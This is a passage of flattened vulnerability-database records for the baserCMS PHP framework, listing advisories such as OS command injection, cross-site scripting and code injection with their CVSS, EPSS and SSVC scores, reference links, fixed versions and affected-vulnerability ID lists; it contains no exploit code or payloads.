scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/commit/7555a5cf0006755dc0223fffc2d882b50a97758b
reference_id
reference_type
scores
0
value 4.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
1
value 4.9
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-05T20:22:00Z/
url https://github.com/baserproject/basercms/commit/7555a5cf0006755dc0223fffc2d882b50a97758b
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2023-43648
reference_id
reference_type
scores
0
value 4.9
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2023-43648
5
reference_url https://github.com/advisories/GHSA-hmqj-gv2m-hq55
reference_id GHSA-hmqj-gv2m-hq55
reference_type
scores
url https://github.com/advisories/GHSA-hmqj-gv2m-hq55
6
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-hmqj-gv2m-hq55
reference_id GHSA-hmqj-gv2m-hq55
reference_type
scores
0
value 4.9
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
1
value 4.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-05T20:22:00Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-hmqj-gv2m-hq55
fixed_packages
0
url pkg:composer/baserproject/basercms@4.8.0
purl pkg:composer/baserproject/basercms@4.8.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-ggv8-3v9t-mfea
7
vulnerability VCID-k5qv-4yp3-zbgf
8
vulnerability VCID-khft-xvrw-g3dr
9
vulnerability VCID-mfm9-gsh3-ubg8
10
vulnerability VCID-nxrf-64er-xbfx
11
vulnerability VCID-p695-t9ye-v3ga
12
vulnerability VCID-sqr4-v889-tff8
13
vulnerability VCID-uedz-j2vn-cbea
14
vulnerability VCID-y2sz-c6vb-pkdp
15
vulnerability VCID-zqd4-rdem-jfgk
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.8.0
1
url pkg:composer/baserproject/basercms@5.0.0
purl pkg:composer/baserproject/basercms@5.0.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-k5qv-4yp3-zbgf
7
vulnerability VCID-khft-xvrw-g3dr
8
vulnerability VCID-mfm9-gsh3-ubg8
9
vulnerability VCID-p695-t9ye-v3ga
10
vulnerability VCID-sqr4-v889-tff8
11
vulnerability VCID-y2sz-c6vb-pkdp
12
vulnerability VCID-zqd4-rdem-jfgk
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.0.0
aliases CVE-2023-43648, GHSA-hmqj-gv2m-hq55
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-u16w-rbuk-ybfs
38
url VCID-uedz-j2vn-cbea
vulnerability_id VCID-uedz-j2vn-cbea
summary
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
baserCMS is a website development framework. Prior to version 5.0.9, there is an OS Command Injection vulnerability in the site search feature of baserCMS. Version 5.0.9 contains a fix for this vulnerability.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2023-51450
reference_id
reference_type
scores
0
value 0.00755
scoring_system epss
scoring_elements 0.73646
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2023-51450
1
reference_url https://basercms.net/security/JVN_09767360
reference_id
reference_type
scores
0
value 5.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-22T16:32:12Z/
url https://basercms.net/security/JVN_09767360
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 5.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/commit/18f426d63e752b4d22c40e9ea8d1f6e692ef601c
reference_id
reference_type
scores
0
value 5.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-22T16:32:12Z/
url https://github.com/baserproject/basercms/commit/18f426d63e752b4d22c40e9ea8d1f6e692ef601c
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2023-51450
reference_id CVE-2023-51450
reference_type
scores
0
value 5.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2023-51450
5
reference_url https://github.com/advisories/GHSA-77fc-4cv5-hmfr
reference_id GHSA-77fc-4cv5-hmfr
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-77fc-4cv5-hmfr
6
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-77fc-4cv5-hmfr
reference_id GHSA-77fc-4cv5-hmfr
reference_type
scores
0
value 5.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-22T16:32:12Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-77fc-4cv5-hmfr
fixed_packages
0
url pkg:composer/baserproject/basercms@5.0.9
purl pkg:composer/baserproject/basercms@5.0.9
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-k5qv-4yp3-zbgf
7
vulnerability VCID-khft-xvrw-g3dr
8
vulnerability VCID-mfm9-gsh3-ubg8
9
vulnerability VCID-p695-t9ye-v3ga
10
vulnerability VCID-sqr4-v889-tff8
11
vulnerability VCID-y2sz-c6vb-pkdp
12
vulnerability VCID-zqd4-rdem-jfgk
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.0.9
aliases CVE-2023-51450, GHSA-77fc-4cv5-hmfr
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-uedz-j2vn-cbea
39
url VCID-vqx2-hzju-r7et
vulnerability_id VCID-vqx2-hzju-r7et
summary
Cross-site Scripting
baserCMS is affected by Cross Site Scripting (XSS) via arbitrary script execution. Admin access is required to exploit this vulnerability. The affected component is `toolbar.php`.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2020-15155
reference_id
reference_type
scores
0
value 0.00868
scoring_system epss
scoring_elements 0.75527
published_at 2026-06-04T12:55:00Z
1
value 0.00868
scoring_system epss
scoring_elements 0.75555
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2020-15155
1
reference_url https://basercms.net/security/20200827
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://basercms.net/security/20200827
2
reference_url https://github.com/baserproject/basercms/commit/94cbfab74c9fd6d04492597a1a684674c3c0e30f
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms/commit/94cbfab74c9fd6d04492597a1a684674c3c0e30f
3
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-4r3m-j6x5-48m3
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:N
1
value LOW
scoring_system cvssv3.1_qr
scoring_elements
2
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms/security/advisories/GHSA-4r3m-j6x5-48m3
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2020-15155
reference_id CVE-2020-15155
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2020-15155
5
reference_url https://github.com/advisories/GHSA-4r3m-j6x5-48m3
reference_id GHSA-4r3m-j6x5-48m3
reference_type
scores
0
value LOW
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-4r3m-j6x5-48m3
fixed_packages
0
url pkg:composer/baserproject/basercms@4.3.7
purl pkg:composer/baserproject/basercms@4.3.7
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1q79-sxzp-zker
1
vulnerability VCID-3new-f12y-8bf9
2
vulnerability VCID-4zw8-truk-pugf
3
vulnerability VCID-5ay3-1t5g-vycu
4
vulnerability VCID-7x3n-4c2b-nfbx
5
vulnerability VCID-891u-x525-ykbb
6
vulnerability VCID-8buz-nsr9-3yge
7
vulnerability VCID-8ssu-umet-37bk
8
vulnerability VCID-ays7-6wvh-augt
9
vulnerability VCID-d1sf-cmct-zbh1
10
vulnerability VCID-eq7f-n3g5-s3hu
11
vulnerability VCID-g56w-z9cx-5ygv
12
vulnerability VCID-ggv8-3v9t-mfea
13
vulnerability VCID-hpk4-a6tr-3ffe
14
vulnerability VCID-j37y-gws9-ake9
15
vulnerability VCID-jby7-s5ez-dqb3
16
vulnerability VCID-k575-suuf-7bhf
17
vulnerability VCID-k5qv-4yp3-zbgf
18
vulnerability VCID-khft-xvrw-g3dr
19
vulnerability VCID-kmpp-6j49-pqfz
20
vulnerability VCID-mfm9-gsh3-ubg8
21
vulnerability VCID-nxrf-64er-xbfx
22
vulnerability VCID-p695-t9ye-v3ga
23
vulnerability VCID-pd8c-9d7z-zkhg
24
vulnerability VCID-sqr4-v889-tff8
25
vulnerability VCID-twf5-bzba-gqb4
26
vulnerability VCID-u16w-rbuk-ybfs
27
vulnerability VCID-uedz-j2vn-cbea
28
vulnerability VCID-wvnk-63hy-ykeq
29
vulnerability VCID-xpsb-2yux-g3cf
30
vulnerability VCID-xxud-7jsh-bbc1
31
vulnerability VCID-y2sz-c6vb-pkdp
32
vulnerability VCID-zqd4-rdem-jfgk
33
vulnerability VCID-zsgc-fnen-b7a6
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.3.7
aliases CVE-2020-15155, GHSA-4r3m-j6x5-48m3
risk_score 3.3
exploitability 0.5
weighted_severity 6.6
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-vqx2-hzju-r7et
40
url VCID-xpsb-2yux-g3cf
vulnerability_id VCID-xpsb-2yux-g3cf
summary
Cross-site Scripting
Improper neutralization of JavaScript input in the blog article editing function of baserCMS allows remote authenticated attackers to inject an arbitrary script via unspecified vectors.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2021-20683
reference_id
reference_type
scores
0
value 0.00203
scoring_system epss
scoring_elements 0.42402
published_at 2026-06-05T12:55:00Z
1
value 0.00203
scoring_system epss
scoring_elements 0.42327
published_at 2026-06-04T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2021-20683
1
reference_url https://basercms.net/security/JVN64869876
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://basercms.net/security/JVN64869876
2
reference_url https://github.com/baserproject/basercms/commit/88ccc61e5656b05dd13204d61de706efaa2cd0b1
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms/commit/88ccc61e5656b05dd13204d61de706efaa2cd0b1
3
reference_url https://jvn.jp/en/jp/JVN64869876/index.html
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://jvn.jp/en/jp/JVN64869876/index.html
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2021-20683
reference_id CVE-2021-20683
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2021-20683
fixed_packages
0
url pkg:composer/baserproject/basercms@4.4.5
purl pkg:composer/baserproject/basercms@4.4.5
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-5ay3-1t5g-vycu
3
vulnerability VCID-7x3n-4c2b-nfbx
4
vulnerability VCID-891u-x525-ykbb
5
vulnerability VCID-8buz-nsr9-3yge
6
vulnerability VCID-8ssu-umet-37bk
7
vulnerability VCID-ays7-6wvh-augt
8
vulnerability VCID-d1sf-cmct-zbh1
9
vulnerability VCID-g56w-z9cx-5ygv
10
vulnerability VCID-ggv8-3v9t-mfea
11
vulnerability VCID-hpk4-a6tr-3ffe
12
vulnerability VCID-j37y-gws9-ake9
13
vulnerability VCID-jby7-s5ez-dqb3
14
vulnerability VCID-k575-suuf-7bhf
15
vulnerability VCID-k5qv-4yp3-zbgf
16
vulnerability VCID-khft-xvrw-g3dr
17
vulnerability VCID-kmpp-6j49-pqfz
18
vulnerability VCID-mfm9-gsh3-ubg8
19
vulnerability VCID-nxrf-64er-xbfx
20
vulnerability VCID-p695-t9ye-v3ga
21
vulnerability VCID-pd8c-9d7z-zkhg
22
vulnerability VCID-sqr4-v889-tff8
23
vulnerability VCID-u16w-rbuk-ybfs
24
vulnerability VCID-uedz-j2vn-cbea
25
vulnerability VCID-y2sz-c6vb-pkdp
26
vulnerability VCID-zqd4-rdem-jfgk
27
vulnerability VCID-zsgc-fnen-b7a6
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.4.5
aliases CVE-2021-20683, GHSA-v9w8-hq92-v39m
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-xpsb-2yux-g3cf
41
url VCID-y2sz-c6vb-pkdp
vulnerability_id VCID-y2sz-c6vb-pkdp
summary
baserCMS Update Functionality Vulnerable to OS Command Injection
### Summary
The latest version of baserCMS (basercms-5.2.2) contains an OS command injection vulnerability (CWE-78) in its update functionality.
Due to this issue, an authenticated user with administrator privileges in baserCMS can execute arbitrary OS commands on the server with the privileges of the user account running baserCMS.

### Details
Please refer to the attached materials.
[OS Command Injection (baserCMS update functionality).pdf](https://github.com/user-attachments/files/25468689/OS.baserCMS.pdf)



### Impact
An authenticated user with administrator privileges in baserCMS can execute OS commands on the server with the privileges of the user account running baserCMS.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-30877
reference_id
reference_type
scores
0
value 0.00063
scoring_system epss
scoring_elements 0.19955
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-30877
1
reference_url https://basercms.net/security/JVN_20837860
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T14:43:30Z/
url https://basercms.net/security/JVN_20837860
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/releases/tag/5.2.3
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T14:43:30Z/
url https://github.com/baserproject/basercms/releases/tag/5.2.3
4
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-m9g7-rgfc-jcm7
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T14:43:30Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-m9g7-rgfc-jcm7
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-30877
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-30877
6
reference_url https://github.com/advisories/GHSA-m9g7-rgfc-jcm7
reference_id GHSA-m9g7-rgfc-jcm7
reference_type
scores
url https://github.com/advisories/GHSA-m9g7-rgfc-jcm7
fixed_packages
0
url pkg:composer/baserproject/basercms@5.2.3
purl pkg:composer/baserproject/basercms@5.2.3
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3
aliases CVE-2026-30877, GHSA-m9g7-rgfc-jcm7
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-y2sz-c6vb-pkdp
42
url VCID-y9f3-k7xk-rucf
vulnerability_id VCID-y9f3-k7xk-rucf
summary
Code Injection
baserCMS allows an attacker to execute arbitrary PHP code on the server via unspecified vectors.
references
0
reference_url http://jvn.jp/en/jp/JVN78151490/index.html
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url http://jvn.jp/en/jp/JVN78151490/index.html
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2017-10844
reference_id
reference_type
scores
0
value 0.00568
scoring_system epss
scoring_elements 0.6893
published_at 2026-06-05T12:55:00Z
1
value 0.00568
scoring_system epss
scoring_elements 0.68891
published_at 2026-06-04T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2017-10844
2
reference_url https://basercms.net/security/JVN78151490
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://basercms.net/security/JVN78151490
3
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2017-10844
reference_id CVE-2017-10844
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2017-10844
fixed_packages
0
url pkg:composer/baserproject/basercms@3.0.15
purl pkg:composer/baserproject/basercms@3.0.15
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1q79-sxzp-zker
1
vulnerability VCID-2u6y-aj6t-7fb1
2
vulnerability VCID-3new-f12y-8bf9
3
vulnerability VCID-4zw8-truk-pugf
4
vulnerability VCID-5ay3-1t5g-vycu
5
vulnerability VCID-6trr-5deb-yydm
6
vulnerability VCID-7x3n-4c2b-nfbx
7
vulnerability VCID-891u-x525-ykbb
8
vulnerability VCID-8buz-nsr9-3yge
9
vulnerability VCID-8ssu-umet-37bk
10
vulnerability VCID-9mf7-56fh-fyfk
11
vulnerability VCID-ays7-6wvh-augt
12
vulnerability VCID-d1sf-cmct-zbh1
13
vulnerability VCID-d5gk-q2hh-kba5
14
vulnerability VCID-e4xa-jm9u-nked
15
vulnerability VCID-eq7f-n3g5-s3hu
16
vulnerability VCID-g56w-z9cx-5ygv
17
vulnerability VCID-ga9u-uv9b-tydr
18
vulnerability VCID-ggv8-3v9t-mfea
19
vulnerability VCID-gsg3-fdmu-vqag
20
vulnerability VCID-hpk4-a6tr-3ffe
21
vulnerability VCID-j37y-gws9-ake9
22
vulnerability VCID-jby7-s5ez-dqb3
23
vulnerability VCID-k575-suuf-7bhf
24
vulnerability VCID-k5qv-4yp3-zbgf
25
vulnerability VCID-khft-xvrw-g3dr
26
vulnerability VCID-kmpp-6j49-pqfz
27
vulnerability VCID-mfm9-gsh3-ubg8
28
vulnerability VCID-nxrf-64er-xbfx
29
vulnerability VCID-p695-t9ye-v3ga
30
vulnerability VCID-p6nr-eu91-53b4
31
vulnerability VCID-pd8c-9d7z-zkhg
32
vulnerability VCID-r4jc-22rq-d3cb
33
vulnerability VCID-sqr4-v889-tff8
34
vulnerability VCID-u16w-rbuk-ybfs
35
vulnerability VCID-uedz-j2vn-cbea
36
vulnerability VCID-vqx2-hzju-r7et
37
vulnerability VCID-xpsb-2yux-g3cf
38
vulnerability VCID-y2sz-c6vb-pkdp
39
vulnerability VCID-yesf-qxgy-3ygx
40
vulnerability VCID-zqd4-rdem-jfgk
41
vulnerability VCID-zsgc-fnen-b7a6
42
vulnerability VCID-zy68-bur9-1fck
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@3.0.15
1
url pkg:composer/baserproject/basercms@4.0.5.1
purl pkg:composer/baserproject/basercms@4.0.5.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1q79-sxzp-zker
1
vulnerability VCID-2u6y-aj6t-7fb1
2
vulnerability VCID-3new-f12y-8bf9
3
vulnerability VCID-4zw8-truk-pugf
4
vulnerability VCID-5ay3-1t5g-vycu
5
vulnerability VCID-6trr-5deb-yydm
6
vulnerability VCID-7x3n-4c2b-nfbx
7
vulnerability VCID-891u-x525-ykbb
8
vulnerability VCID-8buz-nsr9-3yge
9
vulnerability VCID-8ssu-umet-37bk
10
vulnerability VCID-9mf7-56fh-fyfk
11
vulnerability VCID-ays7-6wvh-augt
12
vulnerability VCID-d1sf-cmct-zbh1
13
vulnerability VCID-d5gk-q2hh-kba5
14
vulnerability VCID-e4xa-jm9u-nked
15
vulnerability VCID-eq7f-n3g5-s3hu
16
vulnerability VCID-g56w-z9cx-5ygv
17
vulnerability VCID-ga9u-uv9b-tydr
18
vulnerability VCID-ggv8-3v9t-mfea
19
vulnerability VCID-gsg3-fdmu-vqag
20
vulnerability VCID-hpk4-a6tr-3ffe
21
vulnerability VCID-j37y-gws9-ake9
22
vulnerability VCID-jby7-s5ez-dqb3
23
vulnerability VCID-k575-suuf-7bhf
24
vulnerability VCID-k5qv-4yp3-zbgf
25
vulnerability VCID-khft-xvrw-g3dr
26
vulnerability VCID-kmpp-6j49-pqfz
27
vulnerability VCID-mfm9-gsh3-ubg8
28
vulnerability VCID-nxrf-64er-xbfx
29
vulnerability VCID-p695-t9ye-v3ga
30
vulnerability VCID-p6nr-eu91-53b4
31
vulnerability VCID-pd8c-9d7z-zkhg
32
vulnerability VCID-r4jc-22rq-d3cb
33
vulnerability VCID-sqr4-v889-tff8
34
vulnerability VCID-twf5-bzba-gqb4
35
vulnerability VCID-u16w-rbuk-ybfs
36
vulnerability VCID-uedz-j2vn-cbea
37
vulnerability VCID-vqx2-hzju-r7et
38
vulnerability VCID-wvnk-63hy-ykeq
39
vulnerability VCID-xpsb-2yux-g3cf
40
vulnerability VCID-xxud-7jsh-bbc1
41
vulnerability VCID-y2sz-c6vb-pkdp
42
vulnerability VCID-yesf-qxgy-3ygx
43
vulnerability VCID-zqd4-rdem-jfgk
44
vulnerability VCID-zsgc-fnen-b7a6
45
vulnerability VCID-zy68-bur9-1fck
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.0.5.1
2
url pkg:composer/baserproject/basercms@4.0.6
purl pkg:composer/baserproject/basercms@4.0.6
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1q79-sxzp-zker
1
vulnerability VCID-2u6y-aj6t-7fb1
2
vulnerability VCID-3new-f12y-8bf9
3
vulnerability VCID-4zw8-truk-pugf
4
vulnerability VCID-5ay3-1t5g-vycu
5
vulnerability VCID-6trr-5deb-yydm
6
vulnerability VCID-7x3n-4c2b-nfbx
7
vulnerability VCID-891u-x525-ykbb
8
vulnerability VCID-8buz-nsr9-3yge
9
vulnerability VCID-8ssu-umet-37bk
10
vulnerability VCID-9mf7-56fh-fyfk
11
vulnerability VCID-ays7-6wvh-augt
12
vulnerability VCID-d1sf-cmct-zbh1
13
vulnerability VCID-d5gk-q2hh-kba5
14
vulnerability VCID-e4xa-jm9u-nked
15
vulnerability VCID-eq7f-n3g5-s3hu
16
vulnerability VCID-g56w-z9cx-5ygv
17
vulnerability VCID-ga9u-uv9b-tydr
18
vulnerability VCID-ggv8-3v9t-mfea
19
vulnerability VCID-gsg3-fdmu-vqag
20
vulnerability VCID-hpk4-a6tr-3ffe
21
vulnerability VCID-j37y-gws9-ake9
22
vulnerability VCID-jby7-s5ez-dqb3
23
vulnerability VCID-k575-suuf-7bhf
24
vulnerability VCID-k5qv-4yp3-zbgf
25
vulnerability VCID-khft-xvrw-g3dr
26
vulnerability VCID-kmpp-6j49-pqfz
27
vulnerability VCID-mfm9-gsh3-ubg8
28
vulnerability VCID-nxrf-64er-xbfx
29
vulnerability VCID-p695-t9ye-v3ga
30
vulnerability VCID-p6nr-eu91-53b4
31
vulnerability VCID-pd8c-9d7z-zkhg
32
vulnerability VCID-r4jc-22rq-d3cb
33
vulnerability VCID-sqr4-v889-tff8
34
vulnerability VCID-twf5-bzba-gqb4
35
vulnerability VCID-u16w-rbuk-ybfs
36
vulnerability VCID-uedz-j2vn-cbea
37
vulnerability VCID-vqx2-hzju-r7et
38
vulnerability VCID-wvnk-63hy-ykeq
39
vulnerability VCID-xpsb-2yux-g3cf
40
vulnerability VCID-xxud-7jsh-bbc1
41
vulnerability VCID-y2sz-c6vb-pkdp
42
vulnerability VCID-yesf-qxgy-3ygx
43
vulnerability VCID-zqd4-rdem-jfgk
44
vulnerability VCID-zsgc-fnen-b7a6
45
vulnerability VCID-zy68-bur9-1fck
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.0.6
aliases CVE-2017-10844, GHSA-69gw-v5ph-6vxq
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-y9f3-k7xk-rucf
43
url VCID-yesf-qxgy-3ygx
vulnerability_id VCID-yesf-qxgy-3ygx
summary
Improper Access Control
